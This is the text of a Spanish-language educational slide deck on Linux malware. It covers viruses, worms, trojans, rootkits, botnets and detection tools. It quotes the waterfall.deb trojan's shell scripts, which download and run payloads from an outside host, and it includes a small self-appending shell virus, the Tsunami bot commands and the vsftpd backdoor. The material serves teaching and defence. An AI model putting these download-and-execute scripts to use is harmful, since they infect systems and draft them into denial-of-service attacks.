1.

• Malware For Linux

• Amilcar de Len

[email_address] Esta obra est liberada bajo una licencia Creative Commons Atribucin-Compartir-Igual 3.0 Guatemala

2.

Malware :es un tipo de software que tiene como objetivo infiltrarse o daar una computadora sin el consentimiento de su propietario. El trmino virus informtico es utilizado en muchas ocasiones de forma incorrecta para referirse a todos los tipos de malware, incluyendo los verdaderos virus.

Virus Malware? 3. Tipos de Malware

Virus : tiene por objeto alterar el normal funcionamiento de la computadora, sin el permiso o el conocimiento del usuario. Los virus, habitualmente, reemplazan archivos ejecutables por otros infectados con el cdigo de este. Tienen, bsicamente, la funcin de propagarse a travs de un software (ej: autorun.info).Necesita intervencin del usuario.

4. Tipos de Malware

Gusanos : es un programa que sereproducea s mismo, explotando vulnerabilidades, en una red de computadoras para infectar otros equipos. El principal objetivo es infectar a la mayor cantidad de usuarios posible, tambin puede contener instrucciones dainas al igual que los virus.No necesita intervencin del usuario.

5. Tipos de Malware

Toryanos :

• Finjen ser software no daino, incluso vienen acomopaados de aplicaciones no dainas.

6. permite la administracin remota de una computadora, de forma oculta y sin el consentimiento de su propietario, por parte de un usuario no autorizado.

7. Suelen servir para instalar gusanos, spyware sin/con consentimiento del usuario (licencias). 8. Tipos de Malware

Spyware, AdWare :

• recopilan informacinsobre las actividades realizadas por un usuario y distribuirla a agencias de publicidad u otras organizaciones interesadas.

9. Muestran publicidad no deseada.

10. Tipos de Malware

Backdoors:

• Elude mtodos tradicionales de autenticacin

11. Provee acceso remoto a malechores

12. Pueden ser instaladas a travs de otro malware (virus, gusano). 13. Acceso para permanecer ocultos y ejecutar X comandos. 14. Tipos de Malware

Rootkits

• Proviene de root de Sistemas Unix, para obtener acceso a ste.

15. Modifican el sistema operativo para que el malware permanezca oculto al usuario, a nivel de procesos/rutinas.

16. Puede contener capacidades que impiden la eliminacin del cdigo malicioso. 17. Ejemplo 2 procesos-fantasmas: deben detectar que el otro ha sido terminado e iniciar una nueva instancia en cuestin de milisegundos. Deben matarse ambos procesos simultneamente. 18. Tipos de Malware

Ataques distribuidos: BotNets

• Redes de computadoras infectadas por malware (zombies).

19. Spam, DoS.

20. Mantienen el anonimato. 21. Primer Virus sobre Unix 22. Estadsticas de SO -Escritorio Fuente:http://marketshare.hitslink.com Noviembre 2011 23. 24. Por qu Windows?

Popularidad

25. Alianzas estratgicas (monopolio?!) 26. Drivers 27. Y en Servidores? 28. Estadstica SO Servidores (supercomputadoras!) Fuente:www.top500.com Noviembre 2011 29. Status Quo del Malware Fuente: viruslist.com, 2009 30.

Mtodos de Infeccin

31. Malware Linux: programacin shell

#!/bin/sh for archivo in * do tail -4 $0 >> archivo done

32. Malware Linux: archivos ELF 33. Malware Linux: archivos ELF MtodoSilvio Cesare 34. Malware Linux: paquetes de distribuciones (deb, rpm, otros)

Ejecutables, fcil instalacin.

35. Necesitamos privilegios deroot . 36. Malware Linux: waterfall.deb

Troyano

37. Ao 2009 38. Gnome-look.org 39. Malware Linux: waterfall.deb Waterfall.deb ( infected ) Instalar/Ejecutar como root Sistema Infectado! 40. Malware Linux: waterfall.deb

Waterfall.deb descarga un segundo fichero auto.sh

41. Auto.sh se ejecuta con privilegios de root 42. Crea archivo gnome.sh en /etc/profile.d 43. gnome.sh contiene cdigo que permite enviar grandes paquetes de datos a un servidor remoto. 44. Con sto se permite la participacin de la computadora para un ataque DoS. 45. Malware Linux: waterfall.deb

#!/bin/sh cd /usr/bin/ rm Auto.bash sleep 1 wget http://05748.t35.com/Bots/Auto.bash chmod 777 Auto.bash echo ----------------- cd /etc/profile.d/ rm gnome.sh sleep 1 wget http://05748.t35.com/Bots/gnome.sh chmod 777 gnome.sh echo ----------------- clear exit

46. Malware Linux: waterfall.deb

while do rm /usr/bin/run.bash cd /usr/bin/ wget http://05748.t35.com/Bots/index.php wget http://05748.t35.com/Bots/run.bash sleep 4 rm index.php chmod 755 run.bash command -p /usr/bin/run.bash done

Auto.sh 47. Malware Linux: backdoorELF/Tsunami

Infecta con Unix/Linux embebidos.

48. Deposita un ELF en el sistema infectado que obtiene contrasea root por medio de fuerza bruta, creando un usuario fantasma con privilegios de root. 49. Una vez dentro del router, se conecta a un canal IRC donde descarga versiones actualizadas de s mismo. 50. Luego, el atacante puede ejecutar varios comandos maliciosos. 51. Verifica modelo/version de router para aprovecharse de vulnerabilidades. 52. Malware Linux: backdoorELF/Tsunami

. login[password]: permite acceso al bot. . logout : permite al bot desloguearse. . exec : ejecuta un comando de sistema. TSUNAMI[TARGET] [secs]: ste comando hace que bot ejecute un ataque de denegacin de servicios (DoS) hacia un blanco especfico enviando paquetes en intervalos de N segundos.

53. Malware Linux: rootkits

A nivel de Usuario :

54. Es el tipo ms simple de detectar y por consiguiente de

eliminar.

Tpicamente reemplazan una aplicacin de usuario por un programa que stos han modificado por su propia cuenta. stos son fciles relativamente de detectar porque porque el kernel no sufre alteraciones y por sta razn contina siendo confiable.

55. Malware Linux: rootkits

2. A nivel de Sistema :ste tipo es ms complejo ya que se dificulta su deteccin

porque algn componente del kernel ha sufrido alteraciones y ste ltimo deja de ser confiable.

stos rootkits tienen la capacidad de eliminar los logs del atacante intruso e incluso reemplazar las llamadas de sistema (syscalls).

56. Deteccin de Rootkits

Revisin de integridad de archivos

57. Tripwire 58. Rpm --verify 59. Fallos y/o vulnerabilidades en aplicaciones sobre SO

45% de los defectos descubiertos en proyectos de cdigo abierto son considerados defectos de alto riesto.

60. Pueden ser defectos severos que podran resultar en brechas de seguridad. 61. De un anlisis de 5.7 mi de lneas de cdigo, se encuentra un promedio de 0.17 fallos por cada 1000 lneas de cdigo. 62. Software propietario tiene un promedio de 20/30 por cada 1000 lneas. 63. Modelo de desarrollo Open Source detecta y resuelve bugs ms rpido. Fuente: Coverity Scan: Open Source Integrity Report 64. Backdoor en vsftp

Cdigo malicioso que contena un troyano.

65. Se activa cuando el usuario ingresa determinados caracteres. 66. Abre un socket en el puerto 6200 y el atacante podra ingresar tecleando simplemente el caracter ingresado previamente. 67. Flash player (ajeno a vsftp). 68. Conclusiones

Linux es seguro, a medida que se conoce su funcionamiento y sus vulnerabilidades, para poder prevenir mitigar situaciones.

69. No pecar, sensacin de falsa seguridad. 70. Tipo de target Linux a nivel de servidor y escritorio. 71. Debe haber seguridad, fsica, lgica y a nivel de usuario. 72. Iptables, SELinux, Grsecurity, Bastille Linux, AV. 73. Nunca terminamos un proyecto de seguridad. 74. Todo es relativo segn la tendencia... 75. 76. 77. La Seguridad no es un producto, es un proceso

Bruce Schneier

78.

Gracias!

[email_address]

79. Http://adario.antigualug.org